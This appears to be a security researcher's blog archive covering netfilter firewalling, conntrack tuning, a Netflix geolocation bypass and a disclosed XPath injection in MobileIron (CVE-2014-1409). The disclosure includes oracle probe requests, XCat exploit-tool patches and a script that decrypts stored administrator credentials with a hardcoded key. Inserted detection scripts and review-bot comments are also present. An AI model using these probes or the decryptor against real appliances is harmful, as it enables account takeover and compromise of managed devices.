<p><strong>NextGen$'s blog</strong></p>
<p><strong>Application firewalling with netfilter (part 2)</strong> (2015-07-26, Florent Daignière, /posts/2015/07/application-firewalling-with-netfilter-part-2/)</p><p>Last time we looked into <a class="reference external" href="/posts/2015/07/application-firewalling-with-netfilter/">how to do application firewalling with netfilter</a> and came up with an answer whose dependencies aren't shipped by mainstream distributions just yet. Today we will find another way of doing the same thing with the tools everyone has.</p>
<div class="highlight"><pre><span></span># install dependencies
sudo apt-get install sudo
# create a user called 'internet'
sudo adduser internet
# setup the firewall (a built-in chain's policy can only be ACCEPT or DROP,
# so the REJECT goes in a final rule; "iptables -P OUTPUT REJECT" is refused)
sudo iptables -F OUTPUT
sudo iptables -P OUTPUT DROP
sudo iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 443 --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 53 --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport 53 -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -j REJECT
# let our own account run iceweasel as 'internet' (the redirection in
# "sudo cat &gt; file" would run as the unprivileged user, hence tee)
sudo tee /etc/sudoers.d/internet &gt;/dev/null &lt;&lt;EOT
Defaults env_keep+="XAUTHORITY DISPLAY"
$LOGNAME ALL=(internet) NOPASSWD: /usr/bin/iceweasel
EOT
# give access to our MIT-MAGIC-COOKIE to everyone locally (bad idea! man xauth to understand why)
chmod a+rx $HOME
chmod a+r ${XAUTHORITY:-$HOME/.Xauthority}
# run firefox
sudo -u internet /usr/bin/iceweasel
</pre></div>
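<p>Once the rules are loaded, the thing to check is whether anything other than the <cite>internet</cite> account still holds web connections. The script below is an added example (not the post's own code) that parses <cite>/proc/net/tcp</cite>, the per-socket table carrying the owner uid that <cite>-m owner --uid-owner</cite> keys on, and reports established connections to ports 80/443 grouped by owner. The uid 1001 for <cite>internet</cite>, the 192.168.1.100 client and the 203.0.113.10 peer in the embedded sample are constructed, and the address decoding assumes a little-endian host (x86).</p>

```python
#!/usr/bin/env python3
"""Audit established outbound TCP connections per owning uid.

Added example, not the blog's code. After the uid-owner rules are loaded only
the 'internet' account should be able to reach ports 80/443; this reads the
kernel's socket table and shows who actually holds such connections.
"""
import pwd
import socket
import struct
from collections import defaultdict
from typing import Dict, List, Tuple

ESTABLISHED = "01"  # 'st' column value for TCP_ESTABLISHED in /proc/net/tcp


def _decode_endpoint(hexaddr: str) -> Tuple[str, int]:
    """'0100007F:0050' -> ('127.0.0.1', 80).

    /proc/net/tcp prints the IPv4 address as a host-order 32-bit hex value,
    which on a little-endian machine reads byte-reversed (assumption: x86).
    """
    addr, port = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(addr, 16)))
    return ip, int(port, 16)


def parse_proc_net_tcp(text: str) -> List[Tuple[int, str, int, str, int]]:
    """Return (uid, local_ip, local_port, remote_ip, remote_port) for ESTABLISHED sockets."""
    rows = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        fields = line.split()
        if len(fields) < 8 or fields[3] != ESTABLISHED:
            continue
        lip, lport = _decode_endpoint(fields[1])
        rip, rport = _decode_endpoint(fields[2])
        rows.append((int(fields[7]), lip, lport, rip, rport))  # column 7 is the uid
    return rows


def connections_by_uid(text: str, ports=(80, 443)) -> Dict[int, List[str]]:
    """Group remote endpoints on the given destination ports by owning uid."""
    grouped = defaultdict(list)
    for uid, _lip, _lport, rip, rport in parse_proc_net_tcp(text):
        if rport in ports:
            grouped[uid].append(f"{rip}:{rport}")
    return dict(grouped)


def offenders(text: str, allowed_uid: int, ports=(80, 443)) -> Dict[int, List[str]]:
    """Web-port connections owned by anyone other than allowed_uid: these should not exist."""
    return {uid: eps for uid, eps in connections_by_uid(text, ports).items()
            if uid != allowed_uid}


# Constructed /proc/net/tcp excerpt: an sshd listener (uid 0), the browser run as
# uid 1001 ('internet') talking HTTPS, and a stray HTTP connection owned by uid 1000.
SAMPLE = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 6401A8C0:B2D4 0A7100CB:01BB 01 00000000:00000000 00:00000000 00000000  1001        0 23456 1 0000000000000000 20 4 30 10 -1
   2: 6401A8C0:B2E0 0A7100CB:0050 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1
"""


if __name__ == "__main__":
    try:
        allowed = pwd.getpwnam("internet").pw_uid
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except (KeyError, OSError) as exc:  # no such user, or not on Linux
        print(f"falling back to the constructed sample ({exc})")
        allowed, table = 1001, SAMPLE
    for uid, endpoints in offenders(table, allowed).items():
        print(f"uid {uid} holds web connections it should not: {', '.join(endpoints)}")
```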
<p>That works... but is far from perfect. More details on why to follow in my next post.</p>
<p><strong>Application firewalling with netfilter</strong> (2015-07-23, Florent Daignière, /posts/2015/07/application-firewalling-with-netfilter/)</p><p>Today I stumbled upon <a class="reference external" href="https://linuxfr.org/forums/linux-general/posts/cas-d-utilisation-n-autoriser-que-firefox-a-sortir-sur-les-ports-http-s">a post</a> from my friend <a class="reference external" href="http://blog.tuttu.info/">Feth</a>, asking whether allowing <strong>only firefox</strong> to access the internet was possible on Linux... Of course it is! Here's one of the many ways:</p>
<div class="highlight"><pre><span></span># setup the firewall (a built-in chain's policy can only be ACCEPT or DROP,
# so the REJECT goes in a final rule; "iptables -P OUTPUT REJECT" is refused)
sudo iptables -F OUTPUT
sudo iptables -P OUTPUT DROP
sudo iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 --syn -m cgroup --cgroup 1 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 443 --syn -m cgroup --cgroup 1 -j ACCEPT
sudo iptables -A OUTPUT -j REJECT
# create a cgroup named firefox, owned by us so that the steps below need no root
sudo cgcreate -t $LOGNAME:users -a $LOGNAME:users -g net_cls:firefox
# allocate an identifier to the cgroup (the value matched by --cgroup above)
echo 1 &gt; /sys/fs/cgroup/net_cls/firefox/net_cls.classid
# run firefox
cgexec -g net_cls:firefox iceweasel &amp;
</pre></div>
<p>The following commands might be useful to debug what's going on:</p>
<div class="highlight"><pre><span></span>$ ls -ld /sys/fs/cgroup/net_cls/firefox/
drwx------ 2 nextgens users 0 Jul 23 18:03 /sys/fs/cgroup/net_cls/firefox/
$ cat /sys/fs/cgroup/net_cls/firefox/cgroup.procs
</pre></div>
<p>Attentive readers will notice that the above doesn't work for at least two reasons:</p>
<ul class="simple">
<li>Distros don't ship a version of <a class="reference external" href="https://lwn.net/Articles/569678/">netfilter with cgroup support</a> just yet</li>
<li>A browser without DNS resolution is only marginally useful ;)</li>
</ul>
<p>Tomorrow I might blog about how to recompile/repackage a recent-enough version of iptables; or maybe about a different way of doing the same thing involving SELinux and/or network namespaces; or maybe rant about how useless application firewalls are (both as a security control and as a mitigation against privacy leaks).</p>
<p>Feel free to let me know what you prefer in the comments.</p>
<p><strong>Disabling connection tracking on bridge interfaces created by libvirt</strong> (2015-07-22, Florent Daignière, /posts/2015/07/disabling-connection-tracking-on-bridge-interfaces-created-by-libvirt/)</p><p>Today I got bitten by a problem I had already encountered in the past... and as I didn't document it properly, I had to google it again! Let this blog entry be a more permanent record than the previous one.</p>
<p>Early in the morning, the monitoring system started alerting me that the response time of one of the virtualization hosts we use at <a class="reference external" href="https://www.trustmatta.com/">Matta</a> was going through the roof, making everything 'feel' slow.</p>
<p>Connecting to the system through SSH already took tens of seconds, indicating that something was indeed seriously wrong. Modern Linux systems use resource isolation in the form of <a class="reference external" href="https://www.kernel.org/doc/Documentation/cgroups/cgroups.txt">cgroups</a> and are quite resilient to obnoxious programs chewing up resources; the traditional <a class="reference external" href="https://en.wikipedia.org/wiki/Fork_bomb">fork bomb</a> is a lot less effective than it used to be thanks to these improvements.</p>
<p>The following command can be used to see how the processes are grouped by your init system:</p>
<div class="highlight"><pre><span></span>ps xawf -eo pid,user,cgroup,args
</pre></div>
<p>By the time I finally obtained a command prompt on the remote server, I knew that the cause of the problem was kernel-related, so my first command was <cite>dmesg</cite>:</p>
<div class="highlight"><pre><span></span><span class="go">...</span>
<span class="go">nf_conntrack: table full, dropping packet.</span>
<span class="go">...</span>
</pre></div>
<p>This message is familiar; being a penetration testing company, we use and abuse advanced TCP trickery, confusing the hell out of any stateful firewall in the way. Tonight, the culprit was <a class="reference external" href="https://nmap.org/">Nmap</a> conducting a <a class="reference external" href="https://en.wikipedia.org/wiki/Port_scanner#SYN_scanning">SYN scan</a>...</p>
<p>No matter how many resources I allocate to the tracking table, it will never be big enough... and fundamentally, there is no reason to run the traffic bridged from the VMs to the network through a stateful firewall. In the past I dealt with that specific problem by adding a rule telling netfilter to disregard the traffic flowing through the bridged devices:</p>
<div class="highlight"><pre><span></span>iptables --table raw -A PREROUTING -m physdev --physdev-is-bridged -j NOTRACK
</pre></div>
<p>It worked well, up until a new rule was introduced that negated its effect. The improved solution, which stops bridged frames from being handed to iptables at all, reads:</p>
<div class="highlight"><pre><span></span><span class="nb">echo</span> net.bridge.bridge-nf-call-iptables<span class="o">=</span><span class="m">0</span> &gt;&gt; /etc/sysctl.conf
sysctl -p
</pre></div>
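<p>A quick way to catch this condition before the host crawls is to read the same knobs the post mentions. The following is an added example, not the post's code: it computes conntrack table usage from <cite>/proc/sys/net/netfilter/nf_conntrack_count</cite> and <cite>nf_conntrack_max</cite>, checks <cite>net.bridge.bridge-nf-call-iptables</cite>, and counts "table full" lines in a kernel log; <cite>demo()</cite> runs it against a constructed proc tree and log excerpt reproducing the incident, and the 65536 values and the 80% warning threshold are assumptions.</p>

```python
#!/usr/bin/env python3
"""Health check for conntrack pressure on a bridging (libvirt) host.

Added example, not the blog's own code. The proc root is a parameter so the
logic can be exercised against a constructed tree (see demo()).
"""
import os
import re
import subprocess
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# The exact message the post found in dmesg.
TABLE_FULL_RE = re.compile(r"nf_conntrack: table full, dropping packet")


@dataclass
class ConntrackStatus:
    count: int
    maximum: int
    bridge_nf_call_iptables: Optional[int]  # None when br_netfilter is not loaded
    table_full_events: int

    @property
    def usage(self) -> float:
        """Fraction of the conntrack table in use (0.0 when the maximum is unknown)."""
        return self.count / self.maximum if self.maximum else 0.0

    def findings(self, warn_at: float = 0.8) -> List[str]:
        """Human-readable problems; empty when the host looks healthy."""
        out = []
        if self.table_full_events:
            out.append(f"{self.table_full_events} 'table full' event(s) in the kernel log")
        if self.usage >= warn_at:
            out.append(f"conntrack table at {self.usage:.0%} ({self.count}/{self.maximum})")
        if self.bridge_nf_call_iptables == 1:
            out.append("bridged frames are handed to iptables "
                       "(net.bridge.bridge-nf-call-iptables=1); set it to 0 on a bridging host")
        return out


def _read_int(path: str) -> Optional[int]:
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def collect(root: str = "/", kernel_log: str = "") -> ConntrackStatus:
    """Read the knobs under root/proc/sys/net and count 'table full' lines in kernel_log."""
    net = os.path.join(root, "proc", "sys", "net")
    count = _read_int(os.path.join(net, "netfilter", "nf_conntrack_count")) or 0
    maximum = _read_int(os.path.join(net, "netfilter", "nf_conntrack_max")) or 0
    bridge = _read_int(os.path.join(net, "bridge", "bridge-nf-call-iptables"))
    return ConntrackStatus(count, maximum, bridge, len(TABLE_FULL_RE.findall(kernel_log)))


def demo() -> List[str]:
    """Run collect() against a constructed proc tree reproducing the post's incident."""
    with tempfile.TemporaryDirectory() as root:
        net = os.path.join(root, "proc", "sys", "net")
        os.makedirs(os.path.join(net, "netfilter"))
        os.makedirs(os.path.join(net, "bridge"))
        for name, value in (("netfilter/nf_conntrack_count", 65536),   # table completely full
                            ("netfilter/nf_conntrack_max", 65536),
                            ("bridge/bridge-nf-call-iptables", 1)):   # the bad default
            with open(os.path.join(net, name), "w") as fh:
                fh.write(f"{value}\n")
        # Constructed kernel-log excerpt; the 'table full' line is the one from the post.
        log = ("[12345.678] virbr0: port 2(vnet1) entered forwarding state\n"
               "[12346.001] nf_conntrack: table full, dropping packet.\n"
               "[12346.002] nf_conntrack: table full, dropping packet.\n")
        return collect(root, log).findings()


if __name__ == "__main__":
    try:
        dmesg = subprocess.run(["dmesg"], capture_output=True, text=True, check=False).stdout
    except OSError:  # dmesg not available
        dmesg = ""
    problems = collect("/", dmesg).findings()
    print("\n".join(problems) if problems else "conntrack and bridge netfilter look healthy")
```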
<p>Live and learn as they say!</p>
<p><strong>Netflix ultimate geolocation bypass with an edgerouter</strong> (2015-01-05, Florent Daignière, /posts/2015/01/netflix-ultimate-geolocation-bypass-with-an-edgerouter/)</p><p>It looks like <a class="reference external" href="http://www.engadget.com/2015/01/03/netflix-clamps-down-on-vpns/">Netflix has updated their geolocation code</a>... attempting to prevent their users from watching content intended for other regions. This post explores a few technical avenues one might consider to bypass it.</p>
<p>Googling around, it becomes increasingly clear that many people are making a living out of selling bypasses, both in the form of technical solutions and support. The signal-to-noise ratio is very low, and after 15 minutes it became clear that tcpdumping the traffic was the way to find out &quot;what they've changed&quot;.</p>
<p>Up until this month, users tended to use two different techniques to get around the restrictions: they either subscribed to a VPN service (in addition to their Netflix subscription!) or to what providers call a &quot;smart DNS&quot;. Both solutions are unacceptable to me as they are completely inadequate security-wise. <strong>Why should I trust a random system on the internet with my internet traffic when I don't have to?</strong></p>
<p>To give you an illustrated example of why it's a bad idea, let's talk about what seems to be the most popular solution: <a class="reference external" href="https://hola.org/">Hola</a>; it's free as in free-beer. Turns out that these guys are operating a peer to peer network of proxies, reselling your bandwidth through their <a class="reference external" href="https://luminati.io/">Luminati</a> service. One should keep in mind that, on the internet, if you're not paying, odds are you're the product!</p>
<p>TCPDumping the traffic in and out, it became apparent that the geolocation is happening at the DNS level. Luckily for us, there are plenty of open DNS resolvers on the internet. While I won't write down the one I use for obvious reasons, I'll share a list of ideas where you can find one (for free!):</p>
<ul class="simple">
<li><a class="reference external" href="https://www.google.com/search?q=netflix+dns">dedicated websites</a></li>
<li><a class="reference external" href="https://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack/">DDoS reports</a></li>
<li>FAQ from ISPs</li>
</ul>
<p>Of course, <a class="reference external" href="https://en.wikipedia.org/wiki/DNSChanger">I wouldn't trust any of them with my DNS traffic</a> (unlike most of the tutorials I've found on the internet)... So instead of changing the system's resolver to one of them, here is the edgerouter command I've used:</p>
<div class="highlight"><pre><span></span><span class="go">set service dns forwarding options server=/netflix.com/$ip</span>
</pre></div>
<p>This ensures that only the traffic going to *.netflix.com will be queried through that DNS resolver.</p>
<p>This had been working for years, up until this month, when the application was updated. Ever since, the geolocation check finds out which zone I'm actually entitled to. TCPDumping the traffic has once again proved useful and told me that Netflix now does two different DNS queries, using both the system's configured resolver and a hardcoded one (Google's). It then decides which zone you're in based on the result of both, trusting Google's over your local DNS. So yes; if you used to bypass their zone restriction using DNS, they know it ;)</p>
<p>My initial (naive) attempt was to try out what happens when Google can't be reached. The following command does just that:</p>
<div class="highlight"><pre><span></span><span class="go">set protocols static route 8.8.8.8 blackhole</span>
</pre></div>
<p>This works for some definition of &quot;work&quot;. The stream will eventually start, but you will have to wait for timeouts while navigating and picking your movie, making the whole trick sub-optimal. A better solution is to do destination NAT and pretend that our local resolver is Google's. It can be achieved using the following config:</p>
<div class="highlight"><pre><span></span><span class="go">edit service nat rule 4999</span>
<span class="go"> description netflix</span>
<span class="go"> destination {</span>
<span class="go"> address 8.8.8.8</span>
<span class="go"> port 53</span>
<span class="go"> }</span>
<span class="go"> inbound-interface $LAN_IF</span>
<span class="go"> inside-address {</span>
<span class="go"> address $LAN_IP</span>
<span class="go"> }</span>
<span class="go"> protocol tcp_udp</span>
<span class="go"> type destination</span>
</pre></div>
<p>Using iptables, it would look like this:</p>
<div class="highlight"><pre><span></span>iptables -t nat -A PREROUTING -d <span class="m">8</span>.8.8.8/32 -i <span class="nv">$LAN_IF</span> -p udp -m udp --dport <span class="m">53</span> -j DNAT --to-destination <span class="nv">$LAN_IP</span>
iptables -t nat -A PREROUTING -d <span class="m">8</span>.8.8.8/32 -i <span class="nv">$LAN_IF</span> -p tcp -m tcp --dport <span class="m">53</span> -j DNAT --to-destination <span class="nv">$LAN_IP</span>
</pre></div>
<p>That works wonders and is the ultimate solution to me. It's not wasting bandwidth encapsulating traffic through a tunnel nor trusting random unknowns on the internet to route it for me... and it's free!</p>
<p><strong>CVE-2014-1409 or the sad tale of an XPath injection affecting mobileiron products</strong> (2014-06-23, Florent Daignière, /posts/2014/06/cve-2014-1409-or-the-sad-tale-of-an-xpath-injection-affecting-mobileiron-products/)</p><p>Following up on my last post about <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injections, I will document part of the process we went through to exploit <a class="reference external" href="https://www.trustmatta.com/advisories/MATTA-2013-004.txt">CVE-2014-1409</a> and hopefully convince a few that this category of bugs is no joke and should be looked for during pentests.</p>
<p>So, what about it? Well, let me tell you a story. The story of a remote-root which doesn't involve any memory corruption on a very widely used and deployed appliance sold by a security vendor.</p>
<p>In terms of exploitation methodology, here is what needs doing:</p>
<blockquote>
<ol class="arabic simple">
<li>identify a valid/error pattern (see requests below)</li>
<li>turn the valid/error pattern into a true/false one (trivial)</li>
<li>exfiltrate the XML content (see structure of the document below to build an optimized query)</li>
<li>de-obfuscate the credentials (see below).</li>
<li>login</li>
</ol>
</blockquote>
<p>All of the above has been described in <a class="reference external" href="https://www.trustmatta.com/advisories/MATTA-2013-004.txt">MATTA-2013-004</a>; the vendor has issued a patch and the advisory was made public on 02-04-14. I feel that releasing more details will help other members of the security community develop signatures for IDSes and plugins for vulnerability scanners.</p>
<p>The two HTTP requests I use to check whether an appliance is vulnerable are the following:</p>
<div class="highlight"><pre><span></span>POST /mics/j_spring_security_check HTTP/1.1
Host: XXX
Referer: https://XXX/mics/login.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

j_username=x'and+concat('1','1')='1&amp;j_password=p
</pre></div>
<p>-&gt; 'valid' case: response will be HTTP 302</p>
<div class="highlight"><pre><span></span>POST /mics/j_spring_security_check HTTP/1.1
Host: XXX
Referer: https://XXX/mics/login.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

j_username=x'and+concat('1','1'=)'1&amp;j_password=p
</pre></div>
<p>-&gt; 'error' case: response will be HTTP 404</p>
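<p>The two probes above are exactly what an IDS signature or a log-parser check should key on. The following is an added example, not code from the advisory or the vendor: it parses requests of that shape, decodes the form body, and flags a <cite>j_username</cite> (or <cite>j_password</cite>) value that closes the XPath string literal and continues with XPath syntax, while leaving a plain apostrophe in a name alone. The sample requests, the benign credentials and the <cite>LOGIN_PATH</cite> constant are constructed from the requests shown above.</p>

```python
#!/usr/bin/env python3
"""Detection logic for XPath-injection probes against the MobileIron login form.

Added example (not the vendor's or the advisory's code). A login value is
flagged when a single quote is used to break out of the XPath literal, i.e.
when the quote sits next to XPath syntax; an apostrophe inside a name is not.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs

LOGIN_PATH = "/mics/j_spring_security_check"  # endpoint from the requests above

QUOTE_BREAKOUT = re.compile(
    r"'\s*(?:and|or)\b"      # literal closed, boolean operator follows: x'and ...
    r"|\b(?:and|or)\s*'"     # operator followed by a fresh literal: ... or 'a
    r"|'\s*[=)\]]"           # literal closed right before =, ) or ]
    r"|[=(]\s*'",            # comparison or function argument opening a literal
    re.IGNORECASE,
)


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into method, path and the decoded form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, path, _version = head.splitlines()[0].split(" ", 2)
    # parse_qs undoes the '+' and percent encoding; only the first value per field is kept.
    fields = {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    return {"method": method, "path": path, **fields}


def is_xpath_injection(value: str) -> bool:
    """True when the value contains a quote and uses it to escape the string literal."""
    return "'" in value and QUOTE_BREAKOUT.search(value) is not None


def classify(raw: str) -> List[str]:
    """Alerts for one request; only the login endpoint's form fields are inspected."""
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"] != LOGIN_PATH:
        return []
    return [f"xpath-injection:{field}"
            for field in ("j_username", "j_password")
            if field in req and is_xpath_injection(req[field])]


def _request(body: str, path: str = LOGIN_PATH) -> str:
    """Build a request shaped like the probes in the post (constructed sample)."""
    return (f"POST {path} HTTP/1.1\nHost: XXX\nReferer: https://XXX/mics/login.jsp\n"
            f"Connection: close\nContent-Type: application/x-www-form-urlencoded\n"
            f"Content-Length: {len(body)}\n\n{body}\n")


# Constructed samples: the two probes from the post, then benign logins.
SAMPLES = {
    "valid-oracle": _request("j_username=x'and+concat('1','1')='1&j_password=p"),
    "error-oracle": _request("j_username=x'and+concat('1','1'=)'1&j_password=p"),
    "benign": _request("j_username=admin&j_password=hunter2"),
    "apostrophe": _request("j_username=o'brien&j_password=p"),
}


def scan(samples: Dict[str, str] = SAMPLES) -> Dict[str, List[str]]:
    """Classify every sample; a signature test would compare this against expectations."""
    return {name: classify(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, alerts in scan().items():
        print(f"{name:14s} {alerts or 'clean'}")
```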
<p>With the assistance of <a class="reference external" href="https://github.com/orf/xcat/">XCat</a> and the following <a class="reference external" href="../exploiting-xpath-injection-vulnerabilities-with-xcat/index.html">patches</a>, you should be able to download the device's configuration file. It contains the obfuscated credentials you will need to connect to <a class="reference external" href="https://XXX/mics/login.jsp">https://XXX/mics/login.jsp</a> as administrator! Keep in mind that you need to set the Referer header for the test vector to work; I have a separate <a class="reference external" href="https://github.com/orf/xcat/">XCat</a> patch for that too.</p>
<div class="highlight"><pre><span></span><span class="nt">&lt;configuration&gt;&lt;identity&gt;</span>
<span class="nt">&lt;user&gt;</span>
<span class="nt">&lt;principal&gt;</span>admin<span class="nt">&lt;/principal&gt;</span>
<span class="nt">&lt;password&gt;</span>base64 encoded obfuscated password<span class="nt">&lt;/password&gt;</span>
<span class="nt">&lt;/user&gt;</span>
<span class="nt">&lt;/identity&gt;&lt;/configuration&gt;</span>
</pre></div>
<p>If the appliance is linked to Active Directory (or another LDAP server), it will also contain the credentials used to connect to it (&lt;directoryUserID&gt; and &lt;directoryPassword&gt;).</p>
<p>The credentials are obfuscated using encryption and a static key. The following script should get you the plaintext:</p>
<div class="highlight"><pre><span></span>#!/usr/bin/env python3
#
# MobileIron uses AES-ECB with PKCS#5-style padding (and a known key)
# to store credentials... What a brilliant idea!
#
# This script is about checking whether the provided
# hash is vulnerable to CVE-2013-7286 or not.
#
# NextGen$ ~ 2013
import sys
import binascii
import hashlib
import string
from Crypto.Cipher import AES  # pycrypto or pycryptodome

if len(sys.argv) &lt; 2:
    sys.exit('Usage: ./CVE-2013-7286.py &lt;base64encoded blob&gt;')

# Strip the padding: the last byte holds the pad length
unpad = lambda s: s[0:-s[-1]]

if __name__ == "__main__":
    # Generate the master key...
    # Yes. It's not a typo!
    phrase = 'Hakuna matata what a woderful phrase'
    m = hashlib.sha1()
    m.update(phrase.encode('ascii'))
    # We only want the 16 first bytes (128bit key, 160bit hash function)
    key = m.digest()[:16]
    ciphertext = binascii.a2b_base64(sys.argv[1])
    cipher = AES.new(key, AES.MODE_ECB)
    # decode as latin-1 so that any byte maps to exactly one character
    plaintext = unpad(cipher.decrypt(ciphertext)).decode('latin-1')
    vulnerable = len(plaintext) &gt; 0 and all(c in string.printable for c in plaintext)
    print('%sVULNERABLE TO CVE-2013-7286' % ('' if vulnerable else 'NOT '))
</pre></div>
<p>Once logged in as administrator on the device, it's game over. You can remotely deploy apps (and get shells!) on all the attached mobile devices and you can capture the traffic flowing through the device. Moreover, you might be able to reuse the AD credentials elsewhere on the infrastructure... OWA and SSL-VPNs are obvious targets. Overall it's a very difficult compromise to recover from as the defender; a successful attack leaves no useful log to speak of.</p>
<p><strong>Exploiting XPath injection vulnerabilities with XCat</strong> (2014-06-21, Florent Daignière, /posts/2014/06/exploiting-xpath-injection-vulnerabilities-with-xcat/)</p><p><a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection bugs are relatively common in web applications, yet it's a vulnerability class ignored by the vast majority of pentesters.</p>
<p>I think that there are two main reasons for that:</p>
<ul class="simple">
<li>The tooling to exploit this type of vulnerabilities sucks.</li>
<li>There are very few documented cases of &quot;useful&quot; bugs being exploited.</li>
</ul>
<p>This blog post will attempt to address the former, by detailing several trivial patches that have been submitted to <a class="reference external" href="https://github.com/orf/xcat/">XCat</a>, an automated <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection exploitation tool. As you will soon realise, like most pentesting tools, <a class="reference external" href="https://github.com/orf/xcat/">XCat</a> needs some love... In its current form, it's next to useless.</p>
<p>Patch number one: should you ever need to exploit a bug where the HTTP response code is your oracle, you will need the following:</p>
<div class="highlight"><pre><span></span>commit 705b58c61efe116694dcfb0c62db9fe0daf1bbda
Author: Florent Daigniere &lt;nextgens@freenetproject.org&gt;
Date: Sat Jan 18 21:28:20 2014 +0000
The logic is not quite right; it can be HTTP codes too
<span class="gh">diff --git a/src/xcat.py b/src/xcat.py</span>
<span class="gh">index 21bf950..f57b4e7 100755</span>
<span class="gd">--- a/src/xcat.py</span>
<span class="gi">+++ b/src/xcat.py</span>
<span class="gu">@@ -445,8 +445,8 @@ if __name__ == &quot;__main__&quot;:</span>
sys.stderr.write(&quot;XCat version %s\n&quot;%__VERSION__)
<span class="gd">- if not any([args.false_keyword, args.true_keyword, args.error_keyword]):</span>
<span class="gd">- sys.stderr.write(&quot;Error: You must supply a false, true or error keywor</span>
<span class="gi">+ if not any([args.false_keyword, args.true_keyword, args.error_keyword, arg</span>
<span class="gi">+ sys.stderr.write(&quot;Error: You must supply a false, true or error keywor</span>
exit()
if not args.post_argument:
</pre></div>
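Review bot: the two changed lines are cut off at <cite>arg</cite> and <cite>keywor</cite>, so neither the element added to the <cite>any([...])</cite> list nor the reworded error message can be checked here; confirm the new element is the same <cite>error_code</cite> attribute that the second patch tests in <cite>payloads.py</cite>, and that the message now tells the user about the code option. Separately, the unchanged <cite>exit()</cite> right below returns status 0 on this usage error; <cite>sys.exit(1)</cite> would let a script driving xcat notice the bad invocation.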
<p>Patch number two: if the bug's oracle is error based, this will also be useful...</p>
<div class="highlight"><pre><span></span>commit 290e93a1a9a57529e7bc07027a87beca9135f43d
Author: Florent Daigniere &lt;nextgens@freenetproject.org&gt;
Date: Sat Jan 18 21:28:54 2014 +0000
Fix the HTTP-error code case
<span class="gh">diff --git a/src/lib/payloads.py b/src/lib/payloads.py</span>
<span class="gh">index 0093c7d..11855c4 100644</span>
<span class="gd">--- a/src/lib/payloads.py</span>
<span class="gi">+++ b/src/lib/payloads.py</span>
<span class="gu">@@ -91,7 +91,7 @@ class PayloadMaker(object):</span>
self._headers = Headers({&quot;User-Agent&quot;:[config.user_agent], &quot;Referer&quot;:[
<span class="gd">- if config.error_keyword:</span>
<span class="gi">+ if config.error_keyword or config.error_code:</span>
self.BASE = string.Template(&quot;&#39; and (if ($payload) then error() els
else:
self.BASE = string.Template(&quot;&#39; and $payload and &#39;1&#39;=&#39;1&quot;.replace(&quot;&#39;
</pre></div>
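Review bot: <cite>if config.error_keyword or config.error_code:</cite> now routes a configured response code to the <cite>error()</cite> template, but nothing in this hunk shows where <cite>error_code</cite> is compared against the response status or that it was parsed to the same type (an integer) as the status the HTTP client reports; normalise it once in the argument parser and add a test that exercises this branch of <cite>PayloadMaker</cite>, since before the fix the wrong template was selected silently for the error-code case.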
<p>I hope these patches will save the next poor soul who runs into the same issue as I did a few hours.</p>
<p>See you soon for a follow-up post, where I will try to convince the audience that <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection bugs can mean serious business.</p>
<p><strong>Is SantanderUK compromised?</strong> (2014-03-25, Florent Daignière, /posts/2014/03/is-santanderuk-compromised/)</p><p>This morning I received a special piece of spam, the kind that warrants a blog post.</p>
<p>It's interesting for several reasons:</p>
<ul class="simple">
<li>It has my name in the Subject Header</li>
<li>It came through an address that I have only given to my bank</li>
<li>It uses a clever old-school trick to avoid <a class="reference external" href="https://en.wikipedia.org/wiki/Bayesian_spam_filtering">bayesian filtering</a> (text hidden with white fonts on a white background)</li>
<li>It used Microsoft's delivery infrastructure (and therefore didn't have any problems with <a class="reference external" href="https://en.wikipedia.org/wiki/Greylisting">grey-listing</a>)</li>
<li>It uses 'sane' headers and contains no links (links tend to be a red flag for spam)</li>
</ul>
<p>As a security professional, when I see that type of targeted spam, several questions spring to mind:</p>
<ul class="simple">
<li>Have they sold my details? If so, where did they get my consent from?</li>
<li>If not, they must have been compromised. What else have they leaked? Do they even know?</li>
</ul>
<p>I have sent them an email this morning, asking the questions above... and will update this post with their reply.</p>
<p>For the curious, here is a copy of the <a class="reference external" href="https://gist.github.com/nextgens/9758683">spam from Santander</a>.</p>
<p><strong>Hello world!</strong> (2014-03-21, Florent Daignière, /posts/2014/03/hello-world/)</p><p>This is our first post! A classic:</p>
<div class="highlight"><pre><span></span><span class="k">print</span><span class="p">(</span><span class="s2">&quot;HELO world!&quot;</span><span class="p">)</span>
</pre></div>
<p>See you soon ;)</p>